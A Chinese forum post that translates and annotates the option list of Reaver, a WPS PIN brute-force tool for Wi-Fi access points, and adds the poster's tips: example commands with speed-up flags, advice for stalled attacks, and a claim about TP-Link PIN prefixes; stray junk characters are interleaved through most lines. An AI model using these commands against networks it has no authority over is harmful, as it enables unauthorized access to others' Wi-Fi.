中尉
- 注册时间
- 2013-4-18
- 金币
- 378 个
- 威望
- 1 个
- 荣誉
- 0 个
累计签到:27 天 连续签到:0 天 [LV.50]初入江湖
|
f" ^( M8 }- j0 K4 u8 a-i, --interface=<wlan> Name of the monitor-mode interface to use1 w' q1 [4 b }3 B& L' t
网卡的监视接口,通常是mon03 \: {# [/ W( Z- b2 n
-b, --bssid=<mac> BSSID of the target AP
" H" c/ G o4 ~) b1 Y& j* _% u AP的MAC地址
) K; q6 N! w3 J* a
7 r; N* H. O Y a3 d2 v; A+ t; Y0 p9 C+ J1 N+ [- p u
Optional Arguments:
+ `9 ~: z1 Y- X5 Z: E -m, --mac=<mac> MAC of the host system" u9 D+ q0 Y8 a) P8 b
指定本机MAC地址,在AP有MAC过滤的时候需要使用
" m% A+ h* F' W -e, --essid=<ssid> ESSID of the target AP
' O# a6 v6 y; y/ x M 路由器的ESSID,一般不用指定3 B& \. |8 R5 ^& }. _
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
+ D$ y6 z( p& v8 @* e$ v" L6 j0 K 信号的频道,如果不指定会自动扫描5 }1 @4 C/ k4 ~3 ^2 r4 T+ ~# T
-o, --out-file=<file> Send output to a log file [stdout]0 O1 M' |- D) e; V
标准输出到文件# k2 X$ V" p/ B5 V) W
-s, --session=<file> Restore a previous session file4 B6 Z( a2 G* i9 O
恢复进程文件2 O, T0 n( c3 A$ K
-C, --exec=<command> Execute the supplied command upon successful pin recovery
' }5 _' _$ g/ h; d) N pin成功后执行命令
' L% v5 Z) O0 N) q' y3 ]( W" m' | -D, --daemonize Daemonize reaver. t6 N( B' Z6 s% I1 K/ R
设置reaver成Daemon
! K8 ]( \" w% U, S2 { -a, --auto Auto detect the best advanced options for the target AP9 p0 P" D5 M( Z6 ]9 Q
对目标AP自动检测高级参数1 W7 y# Q2 S: X) e G% J
-f, --fixed Disable channel hopping
# R% y, I5 o" A$ e) b" i 禁止频道跳转
/ e8 i2 R' W: j# l -5, --5ghz Use 5GHz 802.11 channels0 N+ d1 ~9 L2 l: D N; b* c
使用5G频道) F; f1 I9 ~& r
-v, --verbose Display non-critical warnings (-vv for more)5 V+ H6 `6 N; F+ D, g! \
显示不重要警告信息 -vv 可以显示更多+ t' P0 w+ _9 t9 D8 _5 l! i
-q, --quiet Only display critical messages
9 B( S9 O. [" B" [8 B8 { 只显示关键信息
4 u2 |' q" U" I/ i -h, --help Show help Q; y/ x( i) E# V
显示帮助
! {8 [; Y1 X( m0 f: A& n# ? @6 [- L7 {% B2 q8 R! C0 y3 j" ~
5 \' @( \! E+ F. Q8 S8 Z% PAdvanced Options:1 ~! T9 I; Z: k$ w# m) S% C
-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin
1 q" E8 L' a; Q+ z 直接读取psk(本人测试未成功,建议用网卡自带软件获取)
1 W4 v' X; u x5 F -d, --delay=<seconds> Set the delay between pin attempts [1]5 j) q F4 P" U( {
pin间延时,默认1秒,推荐设06 F) G2 z. W! J
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]& u/ z- ~: N) m7 P8 W, x8 `
AP锁定WPS后等待时间1 Z1 Y) R- A" h6 f- b5 z$ z$ ?; t* K
-g, --max-attempts=<num> Quit after num pin attempts
$ s1 a: a7 c9 Y* [$ z 最大pin次数
' z2 D- q4 K9 N* D, e -x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
8 o& n) }) X2 @/ Q 10次意外失败后等待时间,默认0秒
' f+ {0 [; M, o) O6 m. E2 | -r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
3 a+ t% |- N' I' @9 n' F 每x次pin后等待y秒
3 k- m1 S1 N$ H# H3 J -t, --timeout=<seconds> Set the receive timeout period [5]
9 R, e: j ]. { 收包超时,默认5秒5 A8 ~( m+ e* ^2 f! e; P4 g' R) ^$ y
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]
+ A j' \; d, y! J M5/M7超时,默认0.2秒
) D4 h: ]4 Q) k t/ |4 J; I' L9 O l -A, --no-associate Do not associate with the AP (association must be done by another application)2 \. M( G7 L# q; J6 B: r, i9 U
不连入AP(连入过程必须有其他程序完成)* f6 o4 N; ~- E( [6 o2 h& {3 \+ s# U) I
-N, --no-nacks Do not send NACK messages when out of order packets are received
% G2 H' I9 b, c 不发送NACK信息(如果一直pin不动,可以尝试这个参数)
@& [- o, E, Q" r0 c! r. [3 q f! m -S, --dh-small Use small DH keys to improve crack speed
! U# A r0 f7 F# I: b3 {6 b* i 使用小DH关键值提高速度(推荐使用)6 u: ^8 G2 X' u! H6 F
-L, --ignore-locks Ignore locked state reported by the target AP
3 j1 p2 a3 @7 g2 K 忽略目标AP报告的锁定状态: ^5 e$ m% `: Y5 E* y2 B
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
9 d8 N2 F! K1 l* f 每当收到EAP失败包就终止WPS进程
% E; L2 A" f F& r9 r -n, --nack Target AP always sends a NACK [Auto]0 Q j) c; r5 V2 g$ h( G
对目标AP总是发送NACK,默认自动9 i: s; J0 d5 I' o$ B
-w, --win7 Mimic a Windows 7 registrar [False]
+ z. P y! H" c% q! a7 q8 e 模拟win7注册,默认关闭: O8 J7 \- u! j% S8 I
; y6 U/ |" y! D! g9 k0 p------个人心得---------------------------------------------------------1 L0 w" u6 ]& B
- o' ?& k- v3 w8 t对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的
) m; [' v2 n, r3 z$ o. Y) W( s, Zreaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S/ r! u# n8 q$ W9 l7 X5 T1 H7 s' S5 r# k
' F% K& f8 l8 l: X+ Z" h$ C9 t% n! u; L$ h
如果一直pin不动,尝试加-N参数
) r/ u2 C* |8 creaver -i mon0 -b xx:xx:xx:xx:xx:xx -d 0 -vv -a -S -
1 z* f$ Z7 s( }! s; x5 E3 f# x5 @0 [, j7 S- L1 M- }% Y
① PIN的是TP-Link是5C:63:BF:XX:XX:XX系列 pin的开头是6开通的 (测试多个确实如此不包含奇葩的)
0 ^0 U2 D4 S2 y7 |1 R |
|